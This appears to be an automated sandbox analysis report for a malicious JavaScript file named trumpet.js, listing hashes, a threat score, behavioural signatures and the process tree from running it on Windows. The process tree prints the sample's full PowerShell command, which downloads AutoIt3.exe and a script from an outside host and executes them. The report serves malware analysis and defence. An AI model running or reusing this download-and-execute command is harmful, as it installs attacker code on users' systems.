Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
27-10-2023 18:30
Static task
static1
Behavioral task
behavioral1
Sample
trumpet.js
Resource
win7-20231020-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
trumpet.js
Resource
win10v2004-20231023-en
10 signatures
150 seconds
General
-
Target
trumpet.js
-
Size
134KB
-
MD5
204280ca632ff62b555d696014d788a8
-
SHA1
78b7e04acc6558c67767be4968c7288e729a7727
-
SHA256
87c90baa52860969c97073e0c514b97726e9d4aba8434ee41e9002838aead5f4
-
SHA512
4cac8cba42402366f9d8d10910c09a40d345403ff986de2b898a40237456e33129aebe3e16f044aa0d3d0ecf4aa3414d2c6be33261b0048d186cf6ade3c6d4f1
-
SSDEEP
1536:BZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/08:0T9U7hgaX6eerjqlI2IO6Mzqf40Ml/
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2144 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2144 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1716 wrote to memory of 2144 1716 wscript.exe 28 PID 1716 wrote to memory of 2144 1716 wscript.exe 28 PID 1716 wrote to memory of 2144 1716 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\trumpet.js1⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/temp' -Type Directory -Force;cd 'C:/temp'; Invoke-WebRequest -Uri 'http://profitcentronline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://profitcentronline.com:2351/msidctseyzi' -OutFile 'dctseyzi.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'dctseyzi.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144
-